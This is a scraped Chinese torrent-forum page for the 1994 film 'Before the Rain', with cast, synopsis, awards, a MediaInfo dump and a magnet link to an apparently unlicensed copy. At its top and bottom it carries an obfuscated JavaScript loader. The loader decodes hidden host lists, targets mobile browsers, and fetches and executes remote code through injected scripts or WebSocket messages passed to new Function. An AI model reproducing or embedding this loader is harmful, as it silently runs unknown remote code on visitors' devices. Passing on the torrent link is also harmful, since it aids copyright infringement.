暴雨将至[中文字幕].Before.The.Rain.1994.1080p.BluRay.DTS.x265-10bit 5.80GB

版主小s 1月前 240

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 暴雨将至 / 山雨欲来 / 雨前 / Before the Rain / Pred dozhdot

◎片 名 Пред дождот

◎年 代 1994

◎产 地 北马其顿 / 法国 / 英国

◎类 别 剧情 / 战争

◎语 言 马其顿语 / 英语 / 阿尔巴尼亚语 / 法语

◎上映日期 1994-09-01(威尼斯电影节)

◎IMDb链接 https://www.imdb.com/title/tt0110882/

◎豆瓣评分 8.7/10 (24768人评价)

◎豆瓣链接 https://movie.douban.com/subject/1303036/

◎片 长 113 分钟

◎导 演 米尔科·曼彻夫斯基 Milcho Manchevski (id:1028091)

◎编 剧 米尔科·曼彻夫斯基 Milcho Manchevski (id:1028091)

◎演 员 格莱戈尔·科林 Grégoire Colin (id:1077830)

Dzemail Maksut Dzemail Maksut (id:1118147)

拉宾娜·米特威斯卡 Labina Mitevska (id:1292245)

米莉察·斯托扬诺娃 Milica Stojanova (id:1151739)

彼得·米尔切夫斯基 Petar Mircevski (id:1119304)

拉德·舍博德兹加 Rade Serbedzija (id:1025225)

Katerina Kocevska Katerina Kocevska (id:1104345)

凯特琳·卡特利吉 Katrin Cartlidge (id:1045067)

Abdurrahman Shala Abdurrahman Shala (id:1042110)

Daniel Newman Daniel Newman (id:1131553)

菲丽达·劳 Phyllida Law (id:1048232)

Ljupcho Todorovski Ljupcho Todorovski (id:1408469)

Peter Needham Peter Needham (id:1136399)

Aleksandar Mikic Aleksandar Mikic (id:1395457)

梅托·约瓦诺夫斯基 Meto Jovanovski (id:1104929)

Silvija Stojanovska Silvija Stojanovska (id:1349842)

Jordan Vitanov Jordan Vitanov (id:1160373)

杰伊·维利尔斯 Jay Villiers (id:1154074)

塞多米尔·科拉尔 Cédomir Kolar (id:1288842)

Cat Villiers Cat Villiers (id:1038271)

David Redman David Redman (id:1295364)

Chris Thompson Chris Thompson (id:1299173)

Sue Yelland Sue Yelland (id:1301454)

卡罗琳·哈里斯 Caroline Harris (id:1286088)

Joan Hills Joan Hills (id:1286645)

Sandra Ivatovic Sandra Ivatovic (id:1113179)

Radmila Todorovic Radmila Todorovic (id:1105967)

莫拉格·罗斯 Morag Ross (id:1296145)

Alex Nikolic (id:1270190)

Piers Thompson Piers Thompson (id:1307182)

Zoran Mladenovic Zoran Mladenovic (id:1125736)

◎标 签 马其顿 / 欧洲电影 / 剧情 / 曼切夫斯基 / 民族 / 法国 / 欧洲 / 战争

◎简 介

在马其顿,战争中的波斯尼亚,东正教的一位年轻修士以沉默保护一位年轻女孩,这位阿尔巴尼亚女孩涉嫌杀害一位东正教徒。但其实只是误会。修士以自己的善良决定与女孩私奔。

在伦敦,一位摄影记者(凯特琳·卡特利吉 Katrin Cartlidge 饰)在餐馆与她的丈夫谈论感情变淡的问题,二人争吵激烈之时,一名种族主义者冲入餐馆开枪扫射。爱,在生死之间突然变得清晰。

一位离开好友的摄影记者(拉德·舍博德兹加 Rade Serbedzija 饰)从伦敦出发,回到16年没来的老家马其顿。这里有他的老朋友,他的东正教朋友们,还有与阿尔巴尼亚人的种族矛盾。摄影记者尝试通过和解的方式化解纷争,但是,这一切远没有他想象的那么简单。

“圆圈不是一个圆。”三段相互交错的故事,不同文化、宗教、民族的误会造成的悲剧。

◎获奖情况 (共6项)

第67届奥斯卡金像奖 (1995)

最佳外语片(提名)

└──米尔科·曼彻夫斯基 (id:1028091)

第51届威尼斯电影节 (1994)

金狮奖

└──米尔科·曼彻夫斯基 (id:1028091)

费比西奖(国际影评人联盟奖)

└──米尔科·曼彻夫斯基 (id:1028091)

帕西内蒂奖 最佳男演员

└──拉德·舍博德兹加 (id:1025225)

电影未来奖 Best Film in Competition

└──米尔科·曼彻夫斯基 (id:1028091)

天主教人道精神奖 荣誉提及

└──米尔科·曼彻夫斯基 (id:1028091)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 208291067347762547128448236350825443296 (0x9CB3667EFF9E2A4CEB83E7C0E63E2FE0)

  4. Complete name : [email protected]M.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.80 GiB

  8. Duration : 1 h 53 min

  9. Overall bit rate : 7 337 kb/s

  10. Movie name : Before The Rain 1994 1080p BluRay DTS [email protected]

  11. Encoded date : UTC 2021-10-31 11:11:23

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 53 min

  21. Bit rate : 5 812 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 036 pixels

  24. Display aspect ratio : 1.85:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.122

  31. Stream size : 4.59 GiB (79%)

  32. Title : [email protected]

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : DTS

  39. Format/Info : Digital Theater Systems

  40. Codec ID : A_DTS

  41. Duration : 1 h 53 min

  42. Bit rate mode : Constant

  43. Bit rate : 1 509 kb/s

  44. Channel(s) : 6 channels

  45. Channel layout : C L R Ls Rs LFE

  46. Sampling rate : 48.0 kHz

  47. Frame rate : 93.750 FPS (512 SPF)

  48. Bit depth : 24 bits

  49. Compression mode : Lossy

  50. Stream size : 1.19 GiB (21%)

  51. Title : English

  52. Language : English

  53. Default : Yes

  54. Forced : No


  55. Text #1

  56. ID : 3

  57. Format : PGS

  58. Muxing mode : zlib

  59. Codec ID : S_HDMV/PGS

  60. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  61. Duration : 1 h 49 min

  62. Bit rate : 13.2 kb/s

  63. Count of elements : 1407

  64. Stream size : 10.3 MiB (0%)

  65. Title : CHS

  66. Language : Chinese

  67. Default : Yes

  68. Forced : No


  69. Text #2

  70. ID : 4

  71. Format : PGS

  72. Muxing mode : zlib

  73. Codec ID : S_HDMV/PGS

  74. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  75. Duration : 1 h 49 min

  76. Bit rate : 13.8 kb/s

  77. Count of elements : 1407

  78. Stream size : 10.8 MiB (0%)

  79. Title : CHT

  80. Language : Chinese

  81. Default : No

  82. Forced : No


  83. Menu

  84. 00:00:00.000 : en:Chapter 01

  85. 00:03:44.391 : en:Chapter 02

  86. 00:10:47.981 : en:Chapter 03

  87. 00:13:50.204 : en:Chapter 04

  88. 00:25:19.643 : en:Chapter 05

  89. 00:30:06.430 : en:Chapter 06

  90. 00:35:47.020 : en:Chapter 07

  91. 00:40:55.828 : en:Chapter 08

  92. 00:50:27.524 : en:Chapter 09

  93. 01:00:16.071 : en:Chapter 10

  94. 01:05:57.620 : en:Chapter 11

  95. 01:12:24.632 : en:Chapter 12

  96. 01:17:46.453 : en:Chapter 13

  97. 01:27:05.178 : en:Chapter 14

  98. 01:30:37.891 : en:Chapter 15

  99. 01:31:59.431 : en:Chapter 16

  100. 01:42:22.845 : en:Chapter 17

  101. 01:47:47.419 : en:Chapter 18

  102. 01:49:45.704 : en:Chapter 19

  103. 01:52:55.352 : en:Chapter 20




复制代码


TAGS 剧情 战争

磁力链:
  • magnet:?xt=urn:btih:E30926AA8663D0B0B6446A3C4701993A5D5A364B

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};